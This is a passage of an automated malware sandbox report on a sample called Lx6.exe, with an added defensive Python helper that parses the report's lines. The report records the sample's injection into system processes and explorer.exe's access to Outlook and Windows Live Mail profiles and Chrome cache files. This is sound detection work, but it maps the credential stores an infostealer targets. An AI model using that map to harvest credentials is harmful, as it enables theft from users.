Source: C:\Users\user\Desktop\Lx6.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_00401927 GetSystemTimeAsFileTime,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 0_2_00401927
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_0076915C GetUserNameA,GetSystemTimeAsFileTime,HeapFree, 0_2_0076915C
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_0076D4C8 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError, 0_2_0076D4C8
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_004019F9 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 0_2_004019F9

Stealing of Sensitive Information

Source: Yara match File source: 00000000.00000003.345037637.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.448346739.0000021F4E42C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.797117196.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.344925782.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.712648005.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000003.708638922.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.856104544.000001489B502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.721107955.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.345194769.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.345092170.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.682986739.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000058.00000003.814825751.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000058.00000003.803878408.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.683117141.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000003.767939746.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000003.765039957.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000003.765207667.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000059.00000002.827171942.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.390766199.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.683052464.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.389500778.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000003.767821170.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.344972569.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.682539634.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.345107606.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.682736014.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.712982128.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000043.00000002.778497815.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000058.00000003.814713525.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.390744160.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.860622856.000002240CD02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.345011461.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000059.00000003.822550991.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000003.705598553.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000059.00000003.822358925.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000002.856230458.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000003.705458137.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.682832881.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000043.00000003.775181381.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000058.00000003.803740044.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.451792745.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.344881693.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.344788105.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.389768028.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000003.708468891.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000043.00000003.775368587.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.682410000.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.858783348.000001D023E02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.682621929.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.442938704.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000002.795032491.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Lx6.exe PID: 1172, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4292, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3124, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4372, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4552, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 5832, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 1920, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6064, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csc.exe PID: 5836, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cvtres.exe PID: 1716, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csc.exe PID: 3536, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cvtres.exe PID: 5240, type: MEMORYSTR
Source: Yara match File source: 0.3.Lx6.exe.d294a0.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Lx6.exe.420000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Lx6.exe.d294a0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Lx6.exe.109d4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Lx6.exe.109d4a0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Lx6.exe.111c4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Lx6.exe.1148948.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000043.00000000.773575293.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.389553565.000000000109D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.493910135.000000000111D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000043.00000000.771438221.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.667603922.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.389654961.000000000111C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000043.00000000.769688179.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000000.703497252.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000000.763965956.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.596069262.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000000.704474059.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000000.762259112.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.681894423.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000059.00000000.816576347.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000000.760746671.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.495743811.0000000000D29000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000000.702640862.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000059.00000000.818431890.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000059.00000000.820005242.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.656463020.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000058.00000000.802729381.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.625911169.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.630294105.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.590960903.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.680178718.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.814285126.0000021F457F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.576910703.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.495247062.0000000001148000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.681232862.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.497852767.0000000001181000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000058.00000000.801073925.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000058.00000000.799390295.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.635166996.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.673085569.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_00000e
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_00000f
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_00000c
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_00000d
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\data_0
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_000001
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_000002
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_000010
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_000011
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_000005
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_000003
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_000004
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\data_1
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_000009
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\data_2
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\data_3
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_000007
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\index
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_000008
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_00000a
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_00000b
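The signature lines in this report are flat, one event per line, and the credential-theft evidence is spread across them: the sample itself reads MachineGuid, while explorer.exe (a process the malware injected into) opens the Outlook profile key, the Windows Live Mail key and the Chrome cache. The Python below is an added triage helper, not part of the Joe Sandbox report, that parses lines in the report's own "Source: ..." format and turns them into per-process findings. It serves the Yara match lists of this section and of "Remote Access Functionality" alike, which cite the same dumps. Sample input is a handful of lines copied from this report. The sensitive-location patterns, the list of system binaries that should never touch mail or browser stores, and the assumed field layout of the .sdmp dump names (process index, dump stage, sequence number, base address, page protection, ...) are this example's assumptions and are not stated by the report.

```python
"""Triage helper for Joe Sandbox 'Source: ...' behaviour lines (added example)."""
import re
from collections import defaultdict

# Windows page-protection constants (documented values).
PAGE_READWRITE = 0x04
PAGE_EXECUTE_READWRITE = 0x40

# Constructed sample: a handful of lines copied from the report; one keeps the
# "Jump to behavior" link residue to show that the parser tolerates it.
SAMPLE_LINES = r"""
Source: C:\Users\user\Desktop\Lx6.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\index Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3124, type: MEMORYSTR
Source: Yara match File source: 00000043.00000000.773575293.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.814285126.0000021F457F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
""".strip().splitlines()

BEHAVIOUR = re.compile(
    r"^Source: (?P<proc>\S+) (?P<action>Key opened|Key value queried|File opened|"
    r"Queries volume information): (?P<target>.*?)(?: Jump to behavior)?$")
YARA_PROC = re.compile(
    r"^Source: Yara match File source: Process Memory Space: (?P<name>\S+) PID: (?P<pid>\d+), type: MEMORYSTR$")
YARA_DUMP = re.compile(
    r"^Source: Yara match File source: (?P<dump>[0-9A-F]{8}(?:\.[0-9A-F]+){7})\.sdmp, type: MEMORY$")

# Assumed categories of sensitive locations (patterns chosen for this example).
SENSITIVE = (
    ("mail credentials", re.compile(r"Windows Messaging Subsystem\\Profiles|Windows Live Mail", re.I)),
    ("browser data", re.compile(r"\\Google\\Chrome\\User Data\\", re.I)),
    ("host fingerprint", re.compile(r"\\Cryptography MachineGuid$", re.I)),
)
# Binaries with no business reading mail or browser stores; access from one of
# these points at injected code. Assumed list, not taken from the report.
SYSTEM_PROCESSES = {"explorer.exe", "runtimebroker.exe", "svchost.exe"}


def findings(lines):
    """Map process name -> sorted categories of sensitive locations it touched."""
    hits = defaultdict(set)
    for line in lines:
        m = BEHAVIOUR.match(line)
        if not m:
            continue
        name = m.group("proc").rsplit("\\", 1)[-1].lower()
        for category, pattern in SENSITIVE:
            if pattern.search(m.group("target")):
                hits[name].add(category)
    return {name: sorted(cats) for name, cats in hits.items()}


def flagged_system_processes(found):
    """System binaries that touched credential or browser stores: injection suspects."""
    return sorted(n for n, cats in found.items()
                  if n in SYSTEM_PROCESSES and set(cats) & {"mail credentials", "browser data"})


def yara_processes(lines):
    """(name, pid) pairs whose process memory matched the Yara rule."""
    return {(m.group("name"), int(m.group("pid")))
            for m in map(YARA_PROC.match, lines) if m}


def parse_dump_name(dump):
    """Split a dump name; the field meaning is an assumption about Joe Sandbox naming."""
    f = dump.split(".")
    return {"proc_index": int(f[0], 16), "stage": int(f[1], 16),
            "base": int(f[3], 16), "protect": int(f[4], 16)}


def rwx_dumps(lines):
    """Distinct (process index, base address) of matched dumps whose assumed protection field is RWX."""
    out = set()
    for m in map(YARA_DUMP.match, lines):
        if m:
            d = parse_dump_name(m.group("dump"))
            if d["protect"] == PAGE_EXECUTE_READWRITE:
                out.add((d["proc_index"], d["base"]))
    return sorted(out)


if __name__ == "__main__":
    found = findings(SAMPLE_LINES)
    for name, cats in sorted(found.items()):
        print(f"{name}: {', '.join(cats)}")
    print("injection suspects:", flagged_system_processes(found))
    print("yara-matched processes:", sorted(yara_processes(SAMPLE_LINES)))
    print("RWX matched regions:", [(hex(i), hex(b)) for i, b in rwx_dumps(SAMPLE_LINES)])
```

Run against the full report text, the same functions give the complete picture this section spreads over many lines: explorer.exe is the only process touching mail and browser stores, Lx6.exe alone reads MachineGuid, and the dumps with an RWX protection field are the regions the loader wrote into the RuntimeBroker.exe, cmd.exe, csc.exe and cvtres.exe instances listed above. The volume-information queries from powershell.exe do not hit any category and drop out of the findings.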

Remote Access Functionality

Source: Yara match File source: 00000000.00000003.345037637.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.448346739.0000021F4E42C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.797117196.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.344925782.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.712648005.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000003.708638922.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.856104544.000001489B502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.721107955.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.345194769.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.345092170.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.682986739.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000058.00000003.814825751.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000058.00000003.803878408.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.683117141.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000003.767939746.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000003.765039957.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000003.765207667.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000059.00000002.827171942.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.390766199.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.683052464.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.389500778.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000003.767821170.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.344972569.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.682539634.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.345107606.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.682736014.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.712982128.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000043.00000002.778497815.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000058.00000003.814713525.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.390744160.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.860622856.000002240CD02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.345011461.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000059.00000003.822550991.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000003.705598553.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000059.00000003.822358925.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000002.856230458.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000003.705458137.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.682832881.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000043.00000003.775181381.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000058.00000003.803740044.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.451792745.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.344881693.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.344788105.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.389768028.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000003.708468891.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000043.00000003.775368587.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.682410000.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.858783348.000001D023E02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.682621929.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.442938704.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000002.795032491.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Lx6.exe PID: 1172, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4292, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3124, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4372, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4552, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 5832, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 1920, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6064, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csc.exe PID: 5836, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cvtres.exe PID: 1716, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csc.exe PID: 3536, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cvtres.exe PID: 5240, type: MEMORYSTR
Source: Yara match File source: 0.3.Lx6.exe.d294a0.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Lx6.exe.420000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Lx6.exe.d294a0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Lx6.exe.109d4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Lx6.exe.109d4a0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Lx6.exe.111c4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Lx6.exe.1148948.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000043.00000000.773575293.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.389553565.000000000109D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.493910135.000000000111D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
